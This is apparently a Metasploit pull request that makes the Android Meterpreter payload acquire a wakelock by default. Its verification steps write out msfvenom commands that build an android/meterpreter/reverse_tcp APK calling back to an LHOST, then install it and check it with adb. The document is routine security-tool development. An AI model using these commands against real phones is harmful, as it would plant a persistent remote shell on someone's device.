### PR TITLE
set AndroidWakelock=true by default

### DIFF
--- a/lib/msf/core/payload/android/payload_options.rb
+++ b/lib/msf/core/payload/android/payload_options.rb
@@ -8,9 +8,9 @@ module Msf::Payload::Android::PayloadOptions
     super(info)
     register_advanced_options(
       [
-        Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]), 
-        Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload" ]), 
-        Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]), 
+        Msf::OptBool.new('AndroidMeterpreterDebug', [ false, "Run the payload in debug mode, with logging enabled" ]),
+        Msf::OptBool.new('AndroidWakelock', [ false, "Acquire a wakelock before starting the payload", true ]),
+        Msf::OptBool.new('AndroidHideAppIcon', [ false, "Hide the application icon automatically after launch" ]),
       ]
     )
   end


### PR DESCRIPTION
This pr changes AndroidWakelock to default to true.

## Verification

List the steps needed to make sure this thing works

- [x] `msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o out.apk`
- [x] `./tools/exploit/install_msf_apk.sh out.apk`
- [x] **Verify** `adb shell dumpsys power | grep Payload` shows something like: `  PARTIAL_WAKE_LOCK              'Payload' ACQ=-1s512ms (uid=10069 pid=8521)`
- [x] `msfvenom -p android/meterpreter/reverse_tcp AndroidWakelock=false LHOST=$LHOST LPORT=4444 -o out.apk`
- [x] `./tools/exploit/install_msf_apk.sh out.apk`
- [x] **Verify** `adb shell dumpsys power | grep Payload` is blank
